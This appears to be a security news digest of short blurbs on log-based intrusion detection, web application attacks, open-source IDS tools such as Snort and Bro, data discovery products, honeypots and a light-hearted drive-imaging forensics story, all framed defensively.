A new documet, titled "Log analysis for Intrusion Detection",
is available. It shows how some threats can be detected by
correlating specific patterns on web logs, proxy logs and
authentication logs..
"Log analysis is one of the most overlooked aspects of intrusion detection. Nowadays we see every desktop with an anti-virus, companies with multiple firewalls and even simple end-users buying the latest security related tools.
However, who is watching or monitoring all the information these tools generate? Or even worse, who is watching your web server, mail server or authentication logs?"
Learning lessons from incidents is a very important part of incident handling. Yet with targeted attacks it is very hard as you need to have a case before you can learn. So learning from others is even more important in this case.
Michael reported on an unnamed organization being hit by a limited, targeted attack.
Detection is mostly the very hard part in these attacks. This case seems to have been detected by a very alert user detecting a domainname in an email that wasn't completely right.
Source: InfoSecWriters - Posted by Benjamin D. Thomas
"From an attacker's viewpoint, a Web application is an interesting target for several reasons. First, the quality of the source code as related to security is often rather poor, as numerous bug reports show... Another factor is the applications' complex setup." [Holz06]
Recent years have seen a substantial rise in the number of attacks directed against web applications, such as SQL injection, cross-site scripting attacks (XSS) and other input validation problems such as remote file includes in some PHP applications, command injection in the XML-RPC library and in the awstats[Aws06] package. Partly this is because a great deal of application level code has been written, and some of it without much regard to security issues.
Network admin Doug Porter has conducted enough budget presentations to know that upper management types tune out when it comes to slides about spyware scanners, content filters and the growing sophistication of online criminals. His chances of getting badly needed intrusion defense resources always improve, however, when he talks to the top brass about inconveniences, like the spam clogging their e-mail queues.
There are literally hundreds of reported network attacks each day. Our systems are being compromised by persons trying to intrude, stop, obtain or destroy our precious data. The ability to detect intruders and monitor the network systems that you operate is not just an option. The Sarbanes Oxley Act is a warning to our publicly traded companies that we are not going to be allowed to sit idle as corporate leaders or IT professionals while there might be huge gaps in our network defenses. Network tools for monitoring intrusion and tools to prevent intrusion can be completely cost inhibitive to a company that has not prepared to budget for their implementation or has little exposure to their use. This paper discusses two open source tools, Snort and Bro that are either no cost or low cost that you can obtain and train to use. These tools are designed to monitor traffic, analyze protocols, capture packets, map networks, port scan and prevent intrusion. Whether the attack is from the outside of your LAN or from the inside, do you have the tools and training to meet the demands of securing your network data?
Michael Osborne has been getting a lot of vendor calls lately pitching a new breed of products, typically called electronic data discovery (EDD) tools. These tools promise to investigate historical data to uncover security breaches, compliance failures and plain old errors in transactions across various enterprise systems, from network administration to accounting. Driven by compliance requirements such as Sarbanes-Oxley and the Health Insurance Portability and Accountability Act, these tools focus on user activities, such as who accessed a database or updated a customer account.
A global IT service provider with 39,000 employees and thousands of computing devices is sure to be a tempting target for digital desperados. But which attack scenarios are most likely to keep the security chief up at night? Dave Bixler, CISO for Siemens Business Services Inc., a subsidiary of Munich-based Siemens AG, lists three:
# Spyware;
# Stolen or misplaced laptops with passwords that can be unlocked within minutes using any number of online tools; and
# Employees who load sensitive files onto USB keys and then lose them.
Source: TechWorld.com - Posted by Benjamin D. Thomas
I've been a big fan of honeypots ever since I first learned about them in Clifford Stoll's The Cuckoo's Egg. His story about catching German hackers because of a 75-cent accounting error is a thrilling forensics journey. Today, I support honeypots because they are a must-have early-warning tool in any organisation. If you can't stop the hacker or malware - it's hard to be perfect all the time - the next best thing is early warning. Placing a honeypot within your enterprise network, next to other valuable assets, assures that any rogue outsiders - or insiders - will be discovered quickly. If the hacker or malware touches the fake asset, it's done. Low cost and low noise equals high value.
"Hand me the boot disk." I said as I motioned to Scrap with my right paw. My left paw was busy making sure that the IDE cables were securely fastened to the suspect's hard drive and the clone drive.
"Ah, acquiring a drive in DOS with Encase. This is so old school." Scrap mumbled as he fetched an Encase boot disk from his site bag.
The office was very quiet, and only the hum of the suspect's workstation could be heard above our breathing. It was late, much too late, for a couple of monkeys to be playing around in a client's office trying to acquire a hard drive image.
Source: IT Observer - Posted by Benjamin D. Thomas
To study the proceedings and attacks from hackers, Honeypots are used. The idea thereby is, to put one or more special servers in a network . An aggressor; who cannot differentiate between genuine server/services and honeypots; sooner or later will be taken up the services offered by a Honeypot by his search for a safety gap. All his activities on the honeypot are loged thereby.
